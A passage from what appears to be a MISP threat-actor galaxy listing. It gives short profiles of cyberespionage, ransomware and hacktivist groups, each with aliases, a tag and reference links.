Moshen Dragon is a Chinese-aligned cyberespionage threat actor operating in Central Asia. They have been observed deploying multiple malware triads and utilizing DLL search order hijacking to sideload ShadowPad and PlugX variants. The threat actor also employs various tools, including an LSA notification package and a passive backdoor known as GUNTERS. Their activities involve targeting the telecommunication sector and leveraging Impacket for lateral movement and data exfiltration.

The tag is: misp-galaxy:threat-actor="Moshen Dragon"

Table 12282. Table References

Links

https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/

TiltedTemple

One of their notable tools is a custom backdoor called SockDetour, which operates filelessly and socketlessly on compromised Windows servers. The group’s activities have been linked to the exploitation of vulnerabilities in Zoho ManageEngine ADSelfService Plus and ServiceDesk Plus.

The tag is: misp-galaxy:threat-actor="TiltedTemple"

TiltedTemple is also known as:

  • DEV-0322

  • Circle Typhoon

Table 12283. Table References

Links

https://unit42.paloaltonetworks.com/sockdetour/

https://blog.fox-it.com/2021/11/08/ta505-exploits-solarwinds-serv-u-vulnerability-cve-2021-35211-for-initial-access/

https://www.microsoft.com/en-us/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/

OldGremlin

OldGremlin is a Russian-speaking ransomware group that has been active for several years. They primarily target organizations in Russia, including banks, logistics, industrial, insurance, retail, and IT companies. OldGremlin is known for using phishing emails as an initial infection vector and has developed custom malware for both Windows and Linux systems. They have conducted multiple malicious email campaigns and demand large ransoms from their victims, with some reaching millions of dollars.

The tag is: misp-galaxy:threat-actor="OldGremlin"

Table 12284. Table References

Links

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-new-ransomware-actor-oldgremlin-hits-multiple-organizations

https://www.group-ib.com/blog/oldgremlin-comeback/

https://www.group-ib.com/media-center/press-releases/oldgremlin/

Storm Cloud

Storm Cloud is a Chinese espionage threat actor known for targeting organizations across Asia, particularly Tibetan organizations and individuals. They use a variety of malware families, including GIMMICK and GOSLU, which are feature-rich and multi-platform. Storm Cloud leverages public cloud hosting services like Google Drive for command-and-control channels, making it difficult to detect their activities.

The tag is: misp-galaxy:threat-actor="Storm Cloud"

Table 12285. Table References

Links

https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-gimmick-malware-active-iocs

CostaRicto

CostaRicto is a cyber-espionage threat actor that operates as a mercenary group, offering its services to various clients globally. They use bespoke malware tools and sophisticated techniques like VPN proxy and SSH tunnelling. While their targets are scattered across different regions, there is a concentration in South Asia.

The tag is: misp-galaxy:threat-actor="CostaRicto"

Table 12286. Table References

Links

https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced

https://www.cybersecurityintelligence.com/blog/outsourced-cyber-spying-5335.html

TA402

TA402 is an APT group that has been tracked by Proofpoint since 2020. They primarily target government entities in the Middle East and North Africa, with a focus on intelligence collection. TA402 is known for using sophisticated phishing campaigns and constantly updating their malware implants and delivery methods to evade detection. They have been observed using cloud services like Dropbox and Google Drive for hosting malicious payloads and command-and-control infrastructure.

The tag is: misp-galaxy:threat-actor="TA402"

Table 12287. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/ta402-uses-complex-ironwind-infection-chains-target-middle-east-based-government

https://www.proofpoint.com/us/blog/threat-insight/ugg-boots-4-sale-tale-palestinian-aligned-espionage

SilverFish

SilverFish is believed to be a Russian cyberespionage group that has been involved in various cyberattacks, including the use of the SolarWinds breach as an attack vector. SilverFish has been linked to the Wasted Locker ransomware and has displayed a high level of skill and organization in their cyber operations. There are also connections between SilverFish and the threat actor Evil Corp, suggesting a possible evolution or collaboration between the two groups.

The tag is: misp-galaxy:threat-actor="SilverFish"

Table 12288. Table References

Links

https://www.truesec.com/hub/blog/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies

https://www.prodaft.com/resource/detail/silverfish-global-cyber-espionage-campaign-case-report

https://www.mandiant.com/resources/blog/unc2165-shifts-to-evade-sanctions

Blacktail

Blacktail is a cybercrime group that has gained attention for its ransomware campaigns, particularly the Buhti ransomware. They are known for using custom-built data exfiltration tools and have been observed exploiting vulnerabilities in both Windows and Linux systems.

The tag is: misp-galaxy:threat-actor="Blacktail"

Table 12289. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/buhti-ransomware

https://fortiguard.fortinet.com/threat-signal-report/5170

https://www.redpacketsecurity.com/new-buhti-ransomware-gang-uses-leaked-windows-linux-encryptors/

https://www.redpacketsecurity.com/buhti-ransomware-gang-switches-tactics-utilizes-leaked-lockbit-and-babuk-code/

MalKamak

MalKamak is an Iranian threat actor that has been operating since at least 2018. They have been involved in highly targeted cyber espionage campaigns against global aerospace and telecommunications companies. MalKamak utilizes a sophisticated remote access Trojan called ShellClient, which evades antivirus tools and uses cloud services like Dropbox for command and control.

The tag is: misp-galaxy:threat-actor="MalKamak"

Table 12290. Table References

Links

https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms

DragonForce

DragonForce is a hacktivist group based in Malaysia that has been involved in cyberattacks targeting government institutions and commercial organizations in India. They have also targeted websites affiliated with Israel and have shown support for pro-Palestinian causes. The group has been observed using defacement attacks, distributed denial-of-service attacks, and data leaks as part of their campaigns. DragonForce Malaysia has demonstrated an ability to adapt and evolve their tactics over time.

The tag is: misp-galaxy:threat-actor="DragonForce"

Table 12291. Table References

Links

https://www.darkowl.com/blog-content/hacktivist-groups-use-defacements-in-the-israel-hamas-conflict/

https://blog.radware.com/security/2023/05/india-one-of-the-most-targeted-countries-for-hacktivist-groups/

https://securitybrief.asia/story/dragonforce-malaysia-attacks-israeli-institutions-radware

https://www.radware.com/security/threat-advisories-and-attack-reports/opisrael-a-decade-in-review/

https://blog.radware.com/security/ddos/2022/08/this-was-h1-2022-part-3-beyond-the-war/

https://www.fortinet.com/blog/threat-research/guidance-on-hacktivist-operation-opspatuk-by-dragonforce

LightBasin

UNC1945 is an APT group that has been targeting telecommunications companies globally. They use Linux-based implants to maintain long-term access in compromised networks. UNC1945 has demonstrated advanced technical abilities, utilizing various tools and techniques to evade detection and move laterally through networks. They have also been observed targeting other industries, such as financial and professional consulting, and have been linked to other threat actors, including MustangPanada and RedDelta.

The tag is: misp-galaxy:threat-actor="LightBasin"

LightBasin is also known as:

  • UNC1945

  • CL-CRI-0025

Table 12292. Table References

Links

https://www.mandiant.com/resources/unc2891-overview

https://www.crowdstrike.com/blog/an-analysis-of-lightbasin-telecommunications-attacks/

https://blog.talosintelligence.com/introducing-shrouded-snooper/

Red-Lili

RED-LILI is an active threat actor that has been identified by Checkmarx SCS research team. They have been publishing malicious packages on NPM and PyPi platforms, and have recently automated the process of creating NPM users for package publication. The Checkmarx team has detected around 1500 malicious packages associated with RED-LILI and has continuously disclosed their findings to the respective security teams.

The tag is: misp-galaxy:threat-actor="Red-Lili"

Table 12293. Table References

Links

https://checkmarx.com/blog/a-beautiful-factory-for-malicious-packages/

WildCard

Wildcard is a threat actor that initially targeted Israel’s educational sector with the SysJoker malware. They have since expanded their operations and developed additional malware variants, disguised as legitimate software, including one written in the Rust programming language called RustDown. Their precise identity remains unknown, but they have shown advanced capabilities and a focus on critical sectors within Israel.

The tag is: misp-galaxy:threat-actor="WildCard"

Table 12294. Table References

Links

https://intezer.com/blog/research/wildcard-evolution-of-sysjoker-cyber-threat/

WildPressure

WildPressure is a threat actor that targets industrial-related entities in the Middle East. They use a variety of programming languages, including C++, VBScript, and Python, to develop their malware. They have been observed using virtual private servers and compromised servers, particularly WordPress websites, in their infrastructure. While there are some minor similarities with other threat actors in the region, there is not enough evidence to make any attribution.

The tag is: misp-galaxy:threat-actor="WildPressure"

Table 12295. Table References

Links

https://www.redpacketsecurity.com/it-threat-evolution-q3-2021/

https://securelist.com/wildpressure-targets-macos/103072/

https://www.redpacketsecurity.com/wildpressure-targets-industrial-related-entities-in-the-middle-east/

https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/

TunnelSnake

The TunnelSnake campaign demonstrates the activity of a sophisticated actor that invests significant resources in designing an evasive toolset and infiltrating networks of high-profile organizations. By leveraging Windows drivers, covert communications channels and proprietary malware, the group behind it maintains a considerable level of stealth. That said, some of its TTPs, like the usage of a commodity webshell and open-source legacy code for loading unsigned drivers, may get detected and in fact were flagged by Kaspersky’s product, giving them visibility into the group’s operation.

The tag is: misp-galaxy:threat-actor="TunnelSnake"

Table 12296. Table References

Links

https://www.redpacketsecurity.com/operation-tunnelsnake/

https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/

ScamClub

ScamClub is a threat actor involved in malvertising activities since 2018. They target the Mobile Web market segment, particularly on iOS devices, where security software is often lacking. ScamClub utilizes obfuscation techniques and real-time bidding integration with ad exchanges to push malicious JavaScript payloads, leading to forced redirects and various scams such as phishing and gift card scams.

The tag is: misp-galaxy:threat-actor="ScamClub"

Table 12297. Table References

Links

https://blog.confiant.com/exploring-scamclub-payloads-via-deobfuscation-using-abstract-syntax-trees-65ef7f412537

https://www.malwarebytes.com/blog/threat-intelligence/2023/11/associated-press-espn-cbs-among-top-sites-serving-fake-virus-alerts

Daixin Team

Daixin is a threat actor group that has been active since at least June 2022. They primarily target the healthcare and public health sector with ransomware attacks, stealing sensitive data and threatening to release it if a ransom is not paid. They have successfully targeted various industries, including healthcare, aerospace, automotive, and packaged foods. Daixin gains initial access through VPN servers and exploits vulnerabilities or uses phishing attacks to obtain credentials. They have been responsible for cyberattacks on organizations such as the North Texas Municipal Water District and TransForm Shared Service Org, impacting their networks and stealing customer and patient information.

The tag is: misp-galaxy:threat-actor="Daixin Team"

Table 12298. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-294a

https://www.mycert.org.my/portal/details?menu=431fab9c-d24c-4a27-ba93-e92edafdefa5&id=467c2374-9c18-4fb0-b5a7-155dfca4d611

https://www.databreaches.net/b-files-leaked/

https://titaniam.io/ransomware-prevention-daixin-team-ransomware-group/

https://www.databreaches.net/update-daixin-leaks-more-data-from-bluewater-health-and-other-hospitals-databases-yet-to-be-leaked/

UNC2717

UNC2717 is a threat actor that engages in espionage activities aligned with Chinese government priorities. They demonstrate advanced tradecraft and take measures to avoid detection, making it challenging for network defenders to identify their tools and intrusion methods. UNC2717, along with other Chinese APT actors, has been observed stealing credentials, email communications, and intellectual property. They have targeted global government agencies using malware such as HARDPULSE, QUIETPULSE, and PULSEJUMP.

The tag is: misp-galaxy:threat-actor="UNC2717"

Table 12299. Table References

Links

https://www.fireeye.com/blog/threat-research/2021/05/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices.html

http://internal-www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html

UNC2659

UNC2659 has been active since at least January 2021. We have observed the threat actor move through the whole attack lifecycle in under 10 days. UNC2659 is notable given their use of an exploit in the SonicWall SMA100 SSL VPN product, which has since been patched by SonicWall. The threat actor appeared to download several tools used for various phases of the attack lifecycle directly from those tools’ legitimate public websites.

The tag is: misp-galaxy:threat-actor="UNC2659"

Table 12300. Table References

Links

http://internal-www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html

AeroBlade

AeroBlade is a previously unknown threat actor that has been targeting an aerospace organization in the United States. Their objective appears to be conducting commercial and competitive cyber espionage. They employ spear-phishing as a delivery mechanism, using weaponized documents with embedded remote template injection techniques and malicious VBA macro code. The attacks have been ongoing since September 2022, with multiple phases identified in the attack chain. The origin and precise objective of AeroBlade remain unknown.

The tag is: misp-galaxy:threat-actor="AeroBlade"

Table 12301. Table References

Links

https://blogs.blackberry.com/en/2023/11/aeroblade-on-the-hunt-targeting-us-aerospace-industry

WIP19

WIP19 is a Chinese-speaking threat group involved in espionage targeting the Middle East and Asia. They utilize a stolen certificate to sign their malware, including SQLMaggie, ScreenCap, and a credential dumper. The group has been observed targeting telecommunications and IT service providers, using toolsets authored by WinEggDrop. WIP19’s activities suggest they are after specific information and are part of the broader Chinese espionage landscape.

The tag is: misp-galaxy:threat-actor="WIP19"

Table 12302. Table References

Links

https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/

UNC2447

UNC2447 is a financially motivated threat actor with ties to multiple hacker groups. They have been observed deploying ransomware, including FiveHands and Hello Kitty, and engaging in double extortion tactics. They have been active since at least May 2020 and target organizations in Europe and North America.

The tag is: misp-galaxy:threat-actor="UNC2447"

Table 12303. Table References

Links

https://www.esentire.com/blog/hacker-infrastructure-used-in-cisco-breach-discovered-attacking-a-top-workforce-management-corporation-russias-evil-corp-gang-suspected-reports-esentire

https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html

http://internal-www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-financially-motivated-aggressive-group-carrying-out-ransomware-campaigns-active-iocs

UNC215

UNC215 is a Chinese nation-state threat actor that has been active since at least 2014. They have targeted organizations in various sectors, including government, technology, telecommunications, defense, finance, entertainment, and healthcare. UNC215 has been observed using tools such as Mimikatz, FOCUSFJORD, and HYPERBRO for initial access and post-compromise activities. They have demonstrated a focus on evading detection and have employed tactics such as using trusted third parties, minimizing forensic evidence, and incorporating false flags. UNC215’s targets are located globally, with a particular focus on the Middle East, Europe, Asia, and North America.

The tag is: misp-galaxy:threat-actor="UNC215"

Table 12304. Table References

Links

https://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups

https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html

DEV-0569

DEV-0569, also known as Storm-0569, is a threat actor group that has been observed deploying the Royal ransomware. They utilize malicious ads and phishing techniques to distribute malware and gain initial access to networks. The group has been linked to the distribution of payloads such as Batloader and has forged relationships with other threat actors. DEV-0569 has targeted various sectors, including healthcare, communications, manufacturing, and education in the United States and Brazil.

The tag is: misp-galaxy:threat-actor="DEV-0569"

DEV-0569 is also known as:

  • Storm-0569

Table 12305. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/

UAC-0118

From Russia with Love, is a threat actor group that emerged during the Russia-Ukraine war in 2022. They primarily engage in DDoS attacks and have targeted critical infrastructure, media, energy, and government entities. FRwL has been linked to the use of the Somnia ransomware, which they employ as a wiper rather than for financial gain. While there is no direct evidence linking FRwL to the Russian Main Intelligence Directorate, it is possible that they coordinate activities with state-aligned hacktivist groups.

The tag is: misp-galaxy:threat-actor="UAC-0118"

UAC-0118 is also known as:

  • FRwL

  • FromRussiaWithLove

Table 12306. Table References

Links

https://socprime.com/blog/somnia-malware-detection-uac-0118-aka-frwl-launches-cyber-attacks-against-organizations-in-ukraine-using-enhanced-malware-strains/

https://spixnet.at/cybersecurity-blog/2022/11/15/russian-hacktivists-hit-ukrainian-orgs-with-ransomware-but-no-ransom-demands/

https://outpost24.com/blog/ics-attack-classifications/

UAC-0050

UAC-0050 is a threat actor that has been active since 2020, targeting government agencies in Ukraine. They have been distributing the Remcos RAT malware through phishing campaigns, using tactics such as impersonating the Security Service of Ukraine and sending emails with malicious attachments. The group has also been linked to other hacking collectives, such as UAC-0096, and has previously used remote administration tools like Remote Utilities. The motive behind their attacks is likely espionage.

The tag is: misp-galaxy:threat-actor="UAC-0050"

Table 12307. Table References

Links

https://cert.gov.ua/article/3931296

https://socprime.com/blog/remcos-rat-detection-uac-0050-hackers-launch-phishing-attacks-impersonating-the-security-service-of-ukraine/

https://socprime.com/blog/new-phishing-attack-detection-attributed-to-the-uac-0050-and-uac-0096-groups-spreading-remcos-spyware/

https://cert.gov.ua/article/3804703

UNC2630

UNC2630 is a threat actor believed to be affiliated with the Chinese government. They engage in cyber espionage activities, targeting organizations aligned with Beijing’s strategic objectives. UNC2630 demonstrates advanced tradecraft and employs various malware families, including SLOWPULSE and RADIALPULSE, to compromise Pulse Secure VPN appliances. They also utilize modified binaries and scripts to maintain persistence and move laterally within compromised networks.

The tag is: misp-galaxy:threat-actor="UNC2630"

Table 12308. Table References

Links

https://www.fireeye.com/blog/threat-research/2021/05/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices.html

http://internal-www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html

Sandman APT

First disclosed in 2023, the Sandman APT is likely associated with suspected China-based threat clusters known for using the KEYPLUG backdoor, specifically STORM-0866/Red Dev 40. Sandman is tracked as a distinct cluster, pending additional conclusive information. A notable characteristic is its use of the LuaDream backdoor. LuaDream is based on the Lua platform, a relatively rare occurrence in the cyberespionage domain, historically associated with APTs considered Western or Western-aligned.

The tag is: misp-galaxy:threat-actor="Sandman APT"

BiBiGun

A pro-Hamas hacktivist group developed a wiper called BiBi-Linux to target and destroy data on Israeli systems. The malware impersonates ransomware but operates solely to corrupt and delete files, indicating no data theft. A Windows variant, BiBi-Windows, was also discovered, sharing similarities with BiBi-Linux but targeting all files except executables. ESET researchers have named the group behind the wipers BiBiGun. The group’s TTPs have shown overlaps with Moses Staff, which is believed to have an Iran nexus.

The tag is: misp-galaxy:threat-actor="BiBiGun"

Table 12309. Table References

Links

https://twitter.com/ESETresearch/status/1719437301900595444

https://github.com/knight0x07/BiBi-Windows-Wiper-Analysis?tab=readme-ov-file

https://thehackernews.com/2023/11/new-bibi-windows-wiper-targets-windows.html

https://www.securityjoes.com/post/bibi-linux-a-new-wiper-dropped-by-pro-hamas-hacktivist-group

Storm-1283

Storm-1283 is a threat actor that targeted Microsoft Azure cloud platform. They gained access to user accounts and created OAuth applications using stolen credentials, allowing them to control resources and deploy virtual machines for cryptomining. The targeted organizations incurred significant financial losses ranging from $10,000 to $1.5 million. Storm-1283 utilized compromised accounts and subscriptions to carry out their illicit activities.

The tag is: misp-galaxy:threat-actor="Storm-1283"

Table 12310. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/12/12/threat-actors-misuse-oauth-applications-to-automate-financially-driven-attacks/

Solntsepek

Solntsepek is a threat actor group with ties to the Russian military unit GRU. They have claimed responsibility for a cyberattack on Kyivstar, a Ukrainian mobile operator, and have been linked to previous attacks on Ukrainian infrastructure. Solntsepek has been associated with the Sandworm hacking group, known for their destructive cyberattacks, including the NotPetya worm. They have also engaged in hostile activities, such as revealing personal details of Ukrainian soldiers.

The tag is: misp-galaxy:threat-actor="Solntsepek"

Table 12311. Table References

Links

https://kyivindependent.com/sbu-russian-hacker-group-reponsible-for-kyiv-star-cyberattack/

https://dev.ua/ru/news/atakovali-suspilne-provaiderov-i-minrazvitiya-obschin-kto-stoit-za-rossiiskoi-gruppirovkoi-solntsepek-kotoraya-aktivizirovala-napadeniya-na-ukrainskie-struktury

UNC4736

UNC4736 is a North Korean threat actor that has been involved in supply chain attacks targeting software chains of 3CX and X_TRADER. They have used malware strains such as TAXHAUL, Coldcat, and VEILEDSIGNAL to compromise Windows and macOS systems. UNC4736 has been linked to financially motivated cybercrime operations, particularly focused on cryptocurrency and fintech-related services. They have also demonstrated infrastructure overlap with other North Korean and APT43 activity.

The tag is: misp-galaxy:threat-actor="UNC4736"

Table 12312. Table References

Links

https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise

GambleForce

GambleForce is a threat actor specializing in SQL injection attacks. They have targeted over 20 websites in various sectors across multiple countries, compromising six companies. GambleForce utilizes publicly available pentesting tools and has been active since mid-September 2023.

The tag is: misp-galaxy:threat-actor="GambleForce"

Table 12313. Table References

Links

https://www.group-ib.com/blog/gambleforce-gang/

GREF

GREF is a China-aligned APT group that has been active since at least March 2017. They are known for using custom backdoors, loaders, and ancillary tools in their targeted attacks. Recently, they have been attributed to two active Android campaigns that distribute the BadBazaar malware through malicious apps on official and alternative app stores. GREF has targeted Android users, particularly Uyghurs and other Turkic ethnic minorities outside of China, using trojanized versions of popular messaging apps like Signal and Telegram.

The tag is: misp-galaxy:threat-actor="GREF"

Table 12314. Table References

Links

https://www.welivesecurity.com/en/eset-research/badbazaar-espionage-tool-targets-android-users-trojanized-signal-telegram-apps/

PhantomControl

PhantomControl is a sophisticated threat actor that emerged in November 2023. They utilize phishing emails as their initial infection vector and employ a ScreenConnect client to establish a connection for their malicious activities. Their arsenal includes a VBS script that hides its true intentions and reveals a complex mechanism involving PowerShell scripts and image-based data retrieval. PhantomControl has been associated with the Blind Eagle threat actors, showcasing their versatility and reach.

The tag is: misp-galaxy:threat-actor="PhantomControl"

Table 12315. Table References

Links

https://www.esentire.com/blog/phantomcontrol-returns-with-ande-loader-and-swaetrat

https://www.esentire.com/blog/operation-phantomcontrol

https://securityonline.info/esentire-vs-phantom-unveiling-the-cyber-spooks-dance-of-darkness/

Team-Xecuter

Team-Xecuter is a hacking group led by Gary Bowser, also known as GaryOPA. They were involved in a piracy conspiracy against Nintendo, creating and selling illegal circumvention devices that allowed users to hack video game consoles for playing pirated games. Gary Bowser has admitted his participation in this activity and is facing legal consequences.

The tag is: misp-galaxy:threat-actor="Team-Xecuter"

Table 12316. Table References

Links

https://www.newslocker.com/en-uk/profession/security/ohio-schools-get-new-cybersecurity-resource/

KelvinSecurity

KelvinSecurity is a hacker group that has been active since at least 2015. They are known for their hacktivist and black hat activities, targeting public and private organizations globally. The group sells and leaks databases, documents, and access belonging to their victims, often on the dark web or their own platforms. They have been involved in attacks against various sectors, including telecommunications, political parties, and healthcare.

The tag is: misp-galaxy:threat-actor="KelvinSecurity"

Table 12317. Table References

Links

https://securelist.com/kaspersky-security-bulletin-apt-predictions-2024/111048/

https://www.privacyaffairs.com/kelvinsecurity-hacking-group-morena/

https://www.databreaches.net/bits-n-pieces-trozos-y-piezas-31/

https://www.ibtimes.com/anonymous-challenges-russias-supposed-cyber-prowess-repeat-rosatom-breach-leaks-data-3505131

Storm-1113

Storm-1113 is a threat actor that acts both as an access broker focused on malware distribution through search advertisements and as an “as-a-service” entity providing malicious installers and landing page frameworks. In Storm-1113 malware distribution campaigns, users are directed to landing pages mimicking well-known software that host installers, often MSI files, that lead to the installation of malicious payloads. Storm-1113 is also the developer of EugenLoader, a commodity malware first observed around November 2022.

The tag is: misp-galaxy:threat-actor="Storm-1113"

Table 12318. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/

HomeLand Justice

HomeLand Justice is an Iranian state-sponsored cyber threat group that has been active since at least May 2021. They have targeted various organizations, including a well-known telecommunication company and the Albanian Parliament. The group engaged in information operations and messaging campaigns to amplify the impact of their attacks.

The tag is: misp-galaxy:threat-actor="HomeLand Justice"

Table 12319. Table References

Links

https://www.picussecurity.com/resource/blog/cisa-alert-aa22-264a-iranian-homeland-justice-apt-groups-ttp

https://www.attackiq.com/2022/09/23/attack-graph-response-to-us-cert-alert-aa22-264a-iranian-state-actors-conduct-cyber-operations-against-the-government-of-albania/

https://www.mandiant.com/resources/blog/likely-iranian-threat-actor-conducts-politically-motivated-disruptive-activity-against

UAC-0099

UAC-0099 is a threat actor that has been active since at least May 2023, targeting Ukrainian entities. They have been observed using a known WinRAR vulnerability to carry out attacks, indicating a level of sophistication. The actor relies on PowerShell and the creation of scheduled tasks to execute malicious VBS files for initial infection. Monitoring and limiting the functionality of these components can help mitigate the risk of UAC-0099 attacks.

The tag is: misp-galaxy:threat-actor="UAC-0099"

Table 12320. Table References

Links

https://cert.gov.ua/article/4818341

https://www.deepinstinct.com/blog/threat-actor-uac-0099-continues-to-target-ukraine

Gray Sandstorm

Gray Sandstorm is an Iran-linked threat actor that has been active since at least 2012. They have targeted defense technology companies, maritime transportation companies, and Persian Gulf ports of entry. Their primary method of attack is password spraying, and they have been observed using tools like o365spray. They have a specific focus on US and Israeli targets and are likely operating in support of Iranian interests.

The tag is: misp-galaxy:threat-actor="Gray Sandstorm"

Gray Sandstorm is also known as:

  • DEV-0343

Table 12321. Table References

Links

https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/

https://www.microsoft.com/en-us/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/

Threatsec

ThreatSec is a hacktivist group that has targeted various organizations, including internet service providers in Gaza. They claim to fight for the rights and freedom of the oppressed and do not prioritize monetary gain. The group is part of the "Five Families" consortium, which includes other hacktivist groups such as GhostSec and Stormous. ThreatSec has been involved in cyberattacks, data breaches, and ransomware activities.

The tag is: misp-galaxy:threat-actor="Threatsec"

Table 12322. Table References

Links

https://www.resecurity.com/blog/article/ransomedvc-in-the-spotlight-what-we-know-about-the-ransomware-group-targeting-major-japanese-businesses

https://socradar.io/the-five-families-hacker-collaboration-redefining-the-game/

Cyber Toufan

Cyber Toufan is a threat actor group that has gained prominence for its cyberattacks targeting Israeli organizations. The group’s tactics suggest potential nation-state backing, possibly from Iran. They have been involved in hack-and-leak operations, data breaches, and data destruction, impacting over 100 organizations. Cyber Toufan’s activities align with geopolitical tensions in the Middle East and their attacks are characterized by a combination of technical breaches and psychological warfare.

The tag is: misp-galaxy:threat-actor="Cyber Toufan"

Table 12323. Table References

Links

https://www.darkreading.com/cyberattacks-data-breaches/-cyber-toufan-hacktivists-leaked-100-plus-israeli-orgs-in-one-month

https://socradar.io/dark-web-profile-cyber-toufan-al-aqsa/

https://research.checkpoint.com/2023/11th-december-threat-intelligence-report/

https://blog.polyswarm.io/2023-recap-cyber-activity-in-the-gaza-conflict

https://www.securityweek.com/palestinian-hackers-hit-100-israeli-organizations-in-destructive-attacks/

Water Curupira

With its emergence in 2022, Water Curupira has established itself as a persistent threat actor targeting organizations primarily in South America and Europe. Their modus operandi involves a combination of social engineering tactics and a diversified malware arsenal, including ransomware variants like Black Basta and credential stealers like Cobalt Strike. This multifaceted approach enables them to gain unauthorized access to victim systems, steal sensitive data, and ultimately extort victims through ransomware demands. It has been actively using Pikabot, a loader malware with similarities to Qakbot, in spam campaigns throughout 2023.

The tag is: misp-galaxy:threat-actor="Water Curupira"

Table 12324. Table References

Links

https://www.trendmicro.com/en_us/research/24/a/a-look-into-pikabot-spam-wave-campaign.html

UTA0178

While Volexity largely observed the attacker essentially living off the land, they still deployed a handful of malware files and tools during the course of the incident which primarily consisted of webshells, proxy utilities, and file modifications to allow credential harvesting. Once UTA0178 had access into the network via the ICS VPN appliance, their general approach was to pivot from system to system using compromised credentials. They would then further compromise credentials of users on any new system that was breached, and use these credentials to log into additional systems via RDP. Volexity observed the attacker obtaining credentials in a variety of ways.

The tag is: misp-galaxy:threat-actor="UTA0178"

UTA0178 is also known as:

  • UNC5221

Table 12325. Table References

Links

https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/

https://www.rewterz.com/rewterz-news/rewterz-threat-advisory-ivanti-vpn-zero-days-weaponized-by-unc5221-threat-actors-to-deploy-multiple-malware-families-active-iocs/

https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day

https://quointelligence.eu/2024/01/unc5221-unreported-and-undetected-wirefire-web-shell-variant/

https://www.volexity.com/blog/2024/01/18/ivanti-connect-secure-vpn-exploitation-new-observations/

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

TAG-28

TAG-28 is a Chinese state-sponsored threat actor that has been targeting Indian organizations, including media conglomerates and government agencies. They have been using the Winnti malware, which is commonly shared among Chinese state-sponsored groups. TAG-28’s main objective is to gather intelligence on Indian targets, potentially for espionage purposes.

The tag is: misp-galaxy:threat-actor="TAG-28"

Table 12326. Table References

Links

https://www.recordedfuture.com/blog/china-linked-tag-28-targets-indias-the-times-group

Flax Typhoon

Flax Typhoon is a Chinese state-sponsored threat actor that primarily targets organizations in Taiwan. They conduct espionage campaigns and focus on gaining and maintaining long-term access to networks using minimal malware. Flax Typhoon relies on tools built into the operating system and legitimate software to remain undetected. They exploit vulnerabilities in public-facing servers, use living-off-the-land techniques, and deploy a VPN connection to maintain persistence and move laterally within compromised networks.

The tag is: misp-galaxy:threat-actor="Flax Typhoon"

Flax Typhoon is also known as:

  • Ethereal Panda

Table 12327. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/

https://www.crowdstrike.com/global-threat-report/

Cyber Partisans

The Cyber Partisans, a hacktivist group based in Belarus, has been involved in various cyber-attacks targeting organizations and infrastructure in Belarus and Ukraine. They have hacked and wiped the network of the Belarusian Telegraph Agency, targeted the Belarusian Red Cross, and conducted ransomware attacks on the Belarusian Railway and Belarusian State University. The group aims to expose alleged crimes committed by pro-government organizations and disrupt operations supporting the Russian military operation against Ukraine. They have also leaked stolen data to journalists and expressed support for Ukraine.

The tag is: misp-galaxy:threat-actor="Cyber Partisans"

Table 12328. Table References

Links

https://blog.sekoia.io/the-transportation-sector-cyber-threat-overview/

https://riskybiznews.substack.com/p/risky-biz-news-cyber-partisans-hack

https://therecord.media/cyber-partisans-belarusian-state-university-attack

https://therecord.media/pro-ukraine-hackers-leak-russian-data-in-hopes-someone-will-make-sense-of-it/

https://therecord.media/this-app-will-self-destruct-how-belarusian-hackers-created-an-alternative-telegram-for-activists/

Caliente Bandits

Caliente Bandits is a highly active threat group that targets multiple industries, including finance and entertainment. They distribute the Bandook remote access trojan using Spanish-language lures through low-volume email campaigns. The group primarily impacts individuals with Spanish surnames and conducts reconnaissance to obtain employee data. They masquerade as companies in South America and use Hotmail or Gmail email addresses.

The tag is: misp-galaxy:threat-actor="Caliente Bandits"

Caliente Bandits is also known as:

  • TA2721

